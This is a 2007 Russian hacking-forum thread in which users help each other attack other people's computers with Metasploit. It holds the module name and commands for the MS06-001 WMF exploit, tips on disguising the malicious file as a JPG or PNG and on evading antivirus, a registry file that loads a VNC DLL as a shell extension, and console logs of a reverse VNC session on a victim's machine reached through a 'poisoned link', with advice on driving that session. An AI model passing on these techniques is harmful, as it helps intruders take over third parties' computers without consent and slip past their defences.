Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

27.04.2007, 01:45
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
Мануал постараюсь доделать до 13 мая, если не получица, то уже в июне. уже где-то 60% готово  А за статью респект. мне понра 
|
|
|

09.05.2007, 17:25
|
|
Познающий
Регистрация: 15.01.2007
Сообщений: 41
Провел на форуме: 267196
Репутация:
6
|
|
Все ьы хорошо, если бы еще работало гладко, сам wmf файл у меня не загружается, осел блокирует его, и приходится самому открывать заблокированное окно и нажать Открыть.
Кстати когде я пробовал делать такую же фишку с трояном (начинка window/download_exec), то там тоже все работало, но подтвержадать надо вручную..., а если врубить Каспера или Фаер дак вообще шансов ноль..., малоэффективная вещь...
|
|
|

11.05.2007, 17:46
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Сообщение от Benzin
Все ьы хорошо, если бы еще работало гладко, сам wmf файл у меня не загружается, осел блокирует его, и приходится самому открывать заблокированное окно и нажать Открыть.
Кстати когде я пробовал делать такую же фишку с трояном (начинка window/download_exec), то там тоже все работало, но подтвержадать надо вручную..., а если врубить Каспера или Фаер дак вообще шансов ноль..., малоэффективная вещь...
А ты в курсе, что этот WMF файлик содержит и сам сплоит и начинку и его расширение можно переименовать в любое другое графическое (JPG, PNG, GIF) и он будет так же работать. Ну а впарить этот файл намного легче - так как он картинка. Что до антивирусов - конечно они палят паблик сплоит. Используй более свежие сплоиты...
|
|
|

25.05.2007, 15:21
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Вообщем пробовал я локально поднять VNC-сервер состоящий из одной dll (vncdll.dll). Для этого я создал reg-файл следующего содержания (для того чтоб dll подгружалась, как расширение основной оболочки):
Код:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{EBDF1F20-C829-9999-8233-0020AF3E97A9}\InProcServer32]
@="C:\\WINDOWS\\system32\\vncdll.dll"
"ThreadingModel"="Apartment"
[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Vnc]
@="{EBDF1F20-C829-9999-8233-0020AF3E97A9}"
[HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\Vnc]
@="{EBDF1F20-C829-9999-8233-0020AF3E97A9}"
Положил dll в system32, проверил - dll подгрузилась к Total Commander, но порт не открылся, соответственно нет коннекта вьювером. В случае, если пользоваться MSF - то dll-ка успешно инжектируется во взломанный процесс и всё работает. Вообщем как поднять полноценный удалённый рабочий стол с помощью этой dll ? В чём трабл?
|
|
|

26.05.2007, 12:10
|
|
Участник форума
Регистрация: 09.12.2005
Сообщений: 162
Провел на форуме: 701592
Репутация:
91
|
|
Хоел спросит у тебя о том же. Может какая-то их Export-функций отвечает за поднятие серваера. Я пробовал вызвать init без параметров. Открылать синее окно cmd  Но порт не слушаеться. Lebed, появились какие-нибудь идеи за это время?
|
|
|

26.05.2007, 17:32
|
|
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме: 3818187
Репутация:
369
|
|
народ сори за ламерство конечно! Но я че то ваще ниче не понимаю кароч сделал я ядовитую ссылку впарил её пишет :
Код:
[*] Sending stage (2834 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (340049 bytes)...[*] Upload completed.[*] Starting local TCP relay on 127.0.0.1:5900...[*] Local TCP relay started.[*] Launched vnciewer in the background.[*] VNC Server session 1 opened (10.195.4.62:4444 -> 10.244.7.84:3709)[*] Upload completed.[*] Starting local TCP relay on 127.0.0.1:5900...[*] Local TCP relay started.[*] Launched vnciewer in the background.
вроде все норм да?! а вот зайти никак не могу на шелл ! че делать?? если можно поподробнее плиззз
Да и как сделать что б антивирь не орал???
Последний раз редактировалось satana8920; 26.05.2007 в 18:29..
|
|
|

27.05.2007, 09:09
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Сообщение от satana8920
народ сори за ламерство конечно! Но я че то ваще ниче не понимаю кароч сделал я ядовитую ссылку впарил её пишет :
Код:
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (340049 bytes)...
[*] Upload completed.
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
[*] VNC Server session 1 opened (10.195.4.62:4444 -> 10.244.7.84:3709)
[*] Upload completed.
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
вроде все норм да?! а вот зайти никак не могу на шелл ! че делать?? если можно поподробнее плиззз
Да и как сделать что б антивирь не орал???
1. sessions -i 1 в консоли набери.
2. Попробуй запустить вьювер в ручную и одключится к взломанному компу.
Launched vnciewer in the background. ~ Вьювер запущен на заднем плане..
|
|
|

24.08.2007, 01:30
|
|
Новичок
Регистрация: 21.08.2007
Сообщений: 5
Провел на форуме: 16855
Репутация:
0
|
|
У меня накопилось несколько вопросов по 3ей версии. ответте пожайлуста.
1)
у меня адсл. вседствие чего адрес внешний\внутренний.
>> set LHOST 192.168.1.** (ввёл локальный адрес )
LHOST => 192.168.1.33
>> exploit
[*] Started reverse handler[*] Using URL: http://192.168.1.33:8080/9mcvPzU4ex(эта ссылка не запустилась у человека который сидит у моего же провайдера)[*] Server started.[*] Exploit running as background job.
>> set LHOST 88.147.173.*** (попробовал ввести внешний IP)
LHOST => 88.147.173.190
>> exploit
[*] Started reverse handler[*] Using URL: http://192.168.1.33:8080/EoUUDsz5V(всё равно прописываеться внутренний!)[*] Server started.[*] Exploit running as background job.
P/S. я слышал что возможно нужн овключить переадресацию NAT с внешнего на внутренний. только как это сделать?(ADSL zyxel 660 ru)
2)
>> set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) >( в более ранних версиях вроде указывалась начинка. в 3 не указываеться?или я делаю что то не так?)
P/S Пробовал даже сам на себя заходить с IE6 (SP2)
c lдругой учётки. Файл скачался,но шела не появилось.Обьясните\помоги те пожайлуста.
p.p\s. тут вы сказали что файлик со сплойтом можн опереименовать..А есть параметр для задания его имени?
Последний раз редактировалось Tzar; 24.08.2007 в 16:42..
|
|
|

26.08.2007, 21:59
|
|
Новичок
Регистрация: 21.08.2007
Сообщений: 5
Провел на форуме: 16855
Репутация:
0
|
|
так кто нибудь может ответить?
|
|
|

30.03.2009, 04:46
|
|
Новичок
Регистрация: 27.03.2009
Сообщений: 2
Провел на форуме: 19981
Репутация:
0
|
|
Перезалей видео! пЛиzZZ
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|